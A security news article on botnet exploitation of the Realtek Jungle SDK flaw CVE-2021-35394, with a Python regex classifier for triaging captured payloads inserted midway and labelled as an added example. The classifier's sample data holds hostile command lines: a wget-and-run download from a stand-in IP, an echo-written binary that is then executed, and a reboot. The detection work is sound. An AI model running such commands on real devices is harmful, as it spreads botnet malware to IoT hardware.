In the latter half of 2022, a large number of cyber attacks exploiting a remote code execution vulnerability in the Realtek Jungle SDK were reported. These attacks, 134 million in total, aimed to compromise smart devices.
The vulnerability in question grants unauthorized access to affected devices, enabling attackers to execute code and gain complete control over them.
Unit 42 researchers identified the vulnerability as CVE-2021-35394, which carries a high severity rating of 9.8 out of 10 and has been targeted by various malicious actors.
Palo Alto Networks detected a significant increase in exploitation attempts against this vulnerability between August and October of the previous year, when it accounted for more than 40% of all incidents they tracked.
In total, 190 device models were affected by CVE-2021-35394, since hundreds of different types of devices use Realtek’s RTL8xxxx chips. The susceptible device types are listed below:-
- Routers
- Residential gateways
- IP cameras
- Wi-Fi repeaters from 66 different manufacturers (such as Asus, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel)
Vulnerability Profile
- CVE ID: CVE-2021-35394
- Base Score: 9.8
- Severity: Critical
- Description: Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.
The Exploitation of the Vulnerability
The emergence of a powerful botnet malware dubbed “RedGoBot” was observed in the wild beginning in September 2022. This malware specifically targets IoT devices that are vulnerable to CVE-2021-35394.
These attacks delivered three different types of payloads, listed below:-
- An executable script that downloads malware to the target server by executing a shell command.
- An injected command that writes a binary payload to the server and executes it.
- An injected command that causes the server to reboot.
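To triage captured exploitation payloads into the three classes described above, here is an added example (not code from Unit 42 or from the article) that classifies command strings recovered from IDS alerts or honeypot logs; the regexes, category names and sample captures are constructed for illustration.

```python
import re

# Heuristic patterns for the three payload classes the article describes
# (category names are assumptions, not the article's terminology).
CATEGORIES = {
    # a downloader (wget/curl/tftp) followed by a shell or chmod step
    "download-and-run": re.compile(
        r"\b(?:wget|curl|tftp|ftpget)\b.*(?:\|\s*|;\s*|&&\s*)(?:sh|bash|chmod\s+\+?x|\./)",
        re.S),
    # bytes written with echo -e/-ne to a file, then made executable or run
    "write-and-exec": re.compile(
        r"\becho\s+-n?e\b.*>\s*\S+.*(?:chmod\s+\+?x|;\s*/\S+|\./\S+)", re.S),
    # a bare reboot, which knocks the device offline rather than infecting it
    "reboot": re.compile(r"^\s*(?:/sbin/)?reboot\s*$"),
}


def classify_payload(cmd: str) -> str:
    """Return the payload class for one captured command string, or 'unknown'."""
    for name, pattern in CATEGORIES.items():
        if pattern.search(cmd):
            return name
    return "unknown"


def summarize(captures):
    """Count captured commands per class, as a SOC would for a shift report."""
    counts = {}
    for cmd in captures:
        label = classify_payload(cmd)
        counts[label] = counts.get(label, 0) + 1
    return counts


# Constructed sample captures (documentation IP range, invented file names).
SAMPLE_CAPTURES = [
    "cd /tmp; wget http://198.51.100.7/arm7.sh -O x.sh; sh x.sh",
    r"echo -ne '\x7f\x45\x4c\x46' > /tmp/.b; chmod +x /tmp/.b; /tmp/.b",
    "reboot",
    "ls /etc",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CAPTURES:
        print(f"{classify_payload(cmd):18} {cmd}")
    print(summarize(SAMPLE_CAPTURES))
```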
Several botnet malware families are responsible for most of these attacks, and they are described below:-
In September, RedGoBot also exploited this vulnerability to conduct DDoS attacks. Besides the flooding methods the botnet supports, it can perform DDoS attacks over the following protocols:-
- HTTP
- ICMP
- TCP
- UDP
- VSE
- OpenVPN
Attack Origins
In terms of the origins of the attacks, more than thirty international regions were involved. The United States accounted for 48.3% of all attacks, making it the country that generates the most attacks.
The remaining top seven source countries, where security experts observed threat actors participating in these attacks, are listed below:-
- Vietnam
- Russia
- The Netherlands
- France
- Luxembourg
- Germany
On August 15, 2021, Realtek took action to address a number of critical security vulnerabilities, including the flaw identified as CVE-2021-35394.
Unfortunately, this vulnerability, along with others like CVE-2021-35395, was quickly targeted by malicious actors. As recently as December, botnets were still exploiting these vulnerabilities.
Recommendations
The high volume of attacks that have been observed leveraging CVE-2021-35394 is a clear indication that cybercriminals are actively seeking out vulnerabilities within a company’s supply chain.
These types of vulnerabilities can be challenging for individuals to detect and fix, highlighting the importance of supply chain security.
The recommendations offered by the experts are listed below:-
- Implement robust security protections with Next-Generation Firewalls.
- Make sure to apply patches regularly.
- Always keep the devices up-to-date with the latest upgrades.
- In case of infection, apply a factory reset on the device.